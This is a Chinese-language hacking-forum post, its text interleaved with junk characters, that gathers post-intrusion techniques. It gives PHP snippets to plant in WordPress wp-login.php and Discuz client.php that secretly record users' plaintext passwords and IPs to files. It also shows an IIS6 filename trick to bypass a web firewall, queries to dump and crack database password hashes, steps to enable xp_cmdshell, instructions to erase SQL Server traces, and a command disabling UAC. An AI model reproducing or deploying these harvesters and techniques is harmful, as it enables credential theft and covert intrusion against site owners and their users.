$log_ip=$_SERVER["REMOTE_ADDR"];
2 ?) W7 ~5 g! U0 Q# F$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;3 N- l; H, T/ F- [* v$ S
$txt=$txt.”\r\n”;
  j- v+ P  h% K/ Eif($log_user&&$log_pwd&&$log_ip){
& o) `; r1 M+ s2 p$ G@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
2 ?; I1 g8 d7 r; x0 L}  \) X/ [- u9 Q" B
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。  s% r9 |& V; i7 X0 e
就是搜索case ‘login’' M; p3 y  B( @4 _* Z: ~  t
在它下面直接插入即可,记录的密码生成在pwd.txt中,# s. n$ K, n' K# l/ S! u
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
& o' ]0 V& s) i+ J$ k利用II6文件解析漏洞绕过安全狗代码:
3 W- z# C8 p  J) t;antian365.asp;antian365.jpg1 a* v6 x: e" |; I8 F4 f3 ^
0 J9 G3 `$ L# G
各种类型数据库抓HASH破解最高权限密码!( |) ^6 ~) n5 f( B0 `" b2 V8 W
1.sql server2000
5 |. @! {; A) |3 M/ s  USELECT password from master.dbo.sysxlogins where name='sa'
& b& n! B& z8 n& N) J" T0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
  d: q/ B$ S* L$ p2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
* L2 ?+ t, j) H# O0 g% C/ X5 {) [7 l- O9 L1 X
0×0100- constant header, t; [  K2 c( J3 [
34767D5C- salt  S. h8 L5 ?) ^8 ]5 k9 o% F# ~5 Q
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
' e9 [5 K3 y  c1 n) a1 A2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash2 }5 L  E& F9 D/ C( d0 O
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
5 Y) L6 l. C$ R8 FSQL server 2005:-- D' K- P' J' _+ F% S& C
SELECT password_hash FROM sys.sql_logins where name='sa'
7 c9 I  X8 H) q+ U0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
2 U1 A$ m# G: U. {0×0100- constant header
; x$ S3 F8 a2 Z6 R6 @8 V993BF231-salt
6 J5 n9 O; m2 c( Q5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
" j' d& l! N0 r0 |, ocrack case sensitive hash in cain, try brute force and dictionary based attacks.
: |7 \6 J2 p4 D, |' X" `9 s7 o) \0 X4 O$ }% P0 B) o
update:- following bernardo’s comments:-
! v0 n+ f5 s" I0 p7 Kuse function fn_varbintohexstr() to cast password in a hex string., c& o0 M: B& N0 \4 {9 P
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
! `( w8 u& T$ u6 m7 s. D. J, G" O9 P: W! Q" X, ~/ H0 y& \
MYSQL:-. O5 A( T, D5 Y  y1 K+ q3 n5 |7 k
& |5 E. j. ?' Q2 T0 B
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 j. ?$ Q2 }5 ]% D& T/ |3 `; J1 T
*mysql  < 4.19 S  r' y) S7 F, T, ]5 p' T
2 Q5 j: n$ Y& D; K& s; G
mysql> SELECT PASSWORD(‘mypass’);- P7 A$ d3 m+ m4 `
+——————–+
/ h& ~' L+ O3 _/ |' J( Z6 }  G| PASSWORD(‘mypass’) |
! N+ e' j% G+ ?$ T+——————–+
9 a* b6 ?& j2 o3 J| 6f8c114b58f2ce9e   |* B% s: Y& S6 Q% P9 y) C, v
+——————–+0 ~- O) o7 k7 C) }
) J7 E% \6 ~0 x: y# \- }
*mysql >=4.13 @/ o# @+ f1 K- C- v; I: l3 j) y
& z  C/ F. X% U7 e4 K5 Q# w6 M2 K
mysql> SELECT PASSWORD(‘mypass’);
9 ?6 u9 b& T! G' X$ r+ d' p; d& E+——————————————-+
$ ^7 y6 ], ?) V; I% H/ h& [| PASSWORD(‘mypass’)                        |
8 s* J2 x9 L6 D7 m* K# t+——————————————-+3 R6 z: @3 S5 A; b
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |( Y& B* o5 y9 K7 U9 U- @
+——————————————-+1 f, B, s" @" f* i: u5 v5 M7 k. S

8 g/ g* }( M: o' C( }Select user, password from mysql.user( C/ B; Y3 N- k8 n' G7 I
The hashes can be cracked in ‘cain and abel’
, _$ h0 E0 e' f# A) J5 x" ^/ y$ M* K) N
Postgres:-- X0 {# W  Q9 g  K5 L9 }
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)4 d* ]: v% u/ G
select usename, passwd from pg_shadow;
7 A1 P* l) C2 W& X" |4 busename      |  passwd
" k1 [6 S" h! a5 B% C——————+————————————-
# O0 O* f5 I. k$ t( stestuser            | md5fabb6d7172aadfda4753bf0507ed4396; e  Z, [. a2 z/ q8 H9 v
use mdcrack to crack these hashes:-1 S" I4 x* d! r  k8 E, L$ f8 z0 A
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396; ]' M; }5 G8 L3 {( @* P
) P. g& N8 C9 N( D- U, Z$ W- n' `- ]
Oracle:-1 n! ~5 Q- {2 q1 ?
select name, password, spare4 from sys.user$
& m3 T6 M2 s3 Phashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
" _$ Q" Z0 y# X) W0 d6 P3 h( {5 AMore on Oracle later, i am a bit bored….& B% u- _$ [" }' @+ O9 \1 i3 e
0 w7 K% L5 K$ a; _" m$ B
0 ~  N3 N+ A) u8 J* j  q& r
在sql server2005/2008中开启xp_cmdshell; Q& i  ~/ ]' M) m' S
-- To allow advanced options to be changed.5 R$ O! c% U& A8 B* n$ ^
EXEC sp_configure 'show advanced options', 12 M+ T) `, V- N3 [
GO
3 [, @& m' n6 F5 Q& w9 ^-- To update the currently configured value for advanced options.
' b/ l7 d( V# }RECONFIGURE
% k& P+ y7 ~& H$ F& g9 _$ lGO
* b' ~) Q6 v) k* p0 |-- To enable the feature.0 ^- i8 D" k1 t1 n& A4 z
EXEC sp_configure 'xp_cmdshell', 14 {1 d* L- L. F( P1 E8 ?, W( N
GO
; U6 j1 J3 W5 R& z+ l$ T-- To update the currently configured value for this feature.
9 |' W2 S9 h/ O9 FRECONFIGURE
" I: `" [/ j" n$ _GO9 E' A/ A& g% x! |/ K+ l5 ^1 B* T
SQL 2008 server日志清除,在清楚前一定要备份。8 Q; p, Q" E. H# X- V
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
6 j' _- ]* {2 N; F6 g5 hX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
4 {; m" \' z' |1 l* ?4 j  ~$ f* h: v
对于SQL Server 2008以前的版本:6 e' d/ \2 b; }( L9 o
SQL Server 2005:2 ]0 u, `7 {# Y' p
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
* P, }9 Z" H% ?9 m$ {" ~6 @! j' vSQL Server 2000:3 c/ H# R) t/ Q8 d1 _- k0 `! O! ~$ w
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
& p+ \" o: x$ V) ^  L7 M* @  T" M! M* A; q7 w' g/ @
本帖最后由 simeon 于 2013-1-3 09:51 编辑  l1 W. W1 w4 T6 `8 H; G
' _* J! Z7 h4 `

4 a4 S1 h% }$ M" J  o% Gwindows 2008 文件权限修改' V' T$ o, B  M" C* g: {  w
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx5 e0 K% T& @+ t, {
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98# H  ?4 U5 _( l; v3 Z) L* }  i
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
) i  k6 D( c. u9 C9 v; T4 M" v0 ^+ Q- b9 I0 X( Q/ V+ b
Windows Registry Editor Version 5.00! {7 Y/ J5 O  }4 N8 L
[HKEY_CLASSES_ROOT\*\shell\runas]2 i; F' i: Y$ [+ P
@="管理员取得所有权"
* [. k( `" F$ v- _; _"NoWorkingDirectory"=""$ f+ D: q8 T8 |* O( O; [9 y3 ]/ M
[HKEY_CLASSES_ROOT\*\shell\runas\command]% E* P2 D. x4 ^3 h" g
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
; n3 T, t$ U2 E1 r"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"2 c6 I$ `2 I5 d7 _' Q" K
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
+ q5 s# U5 `7 S) T5 L% l; s@="管理员取得所有权"8 N; p( I$ M8 T9 H
"NoWorkingDirectory"=""
6 K2 a- Q/ W. m. B( @[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
- j1 b/ {- Y, G# Y+ y% X% h@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
' j0 e6 P9 ~* n# H6 v% ["IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": B2 _) T7 @# P9 U9 \
4 k# |1 x/ j  V, D
[HKEY_CLASSES_ROOT\Directory\shell\runas]8 e1 g9 v) D" }0 B
@="管理员取得所有权"5 O' H; y- H" Q! p
"NoWorkingDirectory"=""
' ~0 X. f9 `4 t$ H& B4 f# {$ x[HKEY_CLASSES_ROOT\Directory\shell\runas\command]: m0 Q  D/ v; c5 z( l' `- _
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
( H# A3 Y( y9 u3 M7 G( q/ C$ Z"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"% S: y2 v2 y3 Q0 `; H
3 f8 O# l% J  l3 h( S

8 G( u3 o" b6 C7 _win7右键“管理员取得所有权”.reg导入
& x$ E2 D4 {# Y2 \4 `二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,: D4 K% D0 B" d  Z: g
1、C:\Windows这个路径的“notepad.exe”不需要替换) L# e1 \2 G+ e8 c8 q* i
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
; r7 [" g* f. z6 O# K: {3、四个“notepad.exe.mui”不要管
  n! B$ H4 P" a- c# ]9 C4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
  u6 Q. _4 Z# k$ w1 a5 j& eC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
& B% ]& K# l6 f替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,' m/ ~& _0 {1 w, ?! D
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。9 Y8 b- X' ^+ @- y0 k$ u
windows 2008中关闭安全策略: / C) {5 l' Y! i  S. j
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
" ]; z$ X: E9 O修改uc_client目录下的client.php 在
4 \4 O5 ]6 [  v0 mfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
$ s* u9 N1 c0 Y/ r, D% u/ m下加入如上代码,在网站./data/cache/目录下自动生成csslog.php* d0 M) x( L- I4 `4 J
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
/ W; N/ p# m0 M, m5 L8 U1 ^if(getenv('HTTP_CLIENT_IP')) {- l$ e  l' A" i/ i1 s, y) {
$onlineip = getenv('HTTP_CLIENT_IP');
3 J3 W6 J# `4 j$ H% Z} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
/ I* Y7 q  v! J/ O+ \/ o) J$onlineip = getenv('HTTP_X_FORWARDED_FOR');
4 _4 ?! x0 s3 `+ l5 ~} elseif(getenv('REMOTE_ADDR')) {
3 [, l. K; U. I! A+ N6 E& I4 P$onlineip = getenv('REMOTE_ADDR');9 }: D5 N& @* m3 q7 [
} else {% \4 [1 }, p; U( W+ d8 Y' M7 f
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
! Y4 O! `, e$ j" K) _; i}
4 Q. j( s1 D6 I8 R8 L     $showtime=date("Y-m-d H:i:s");* u- l0 G+ ]4 D; T: p* Z
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";: y/ m4 p' _. y$ O1 C+ N/ G% l$ O
    $handle=fopen('./data/cache/csslog.php','a+');/ i. U( }2 n7 a6 T# h) y
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表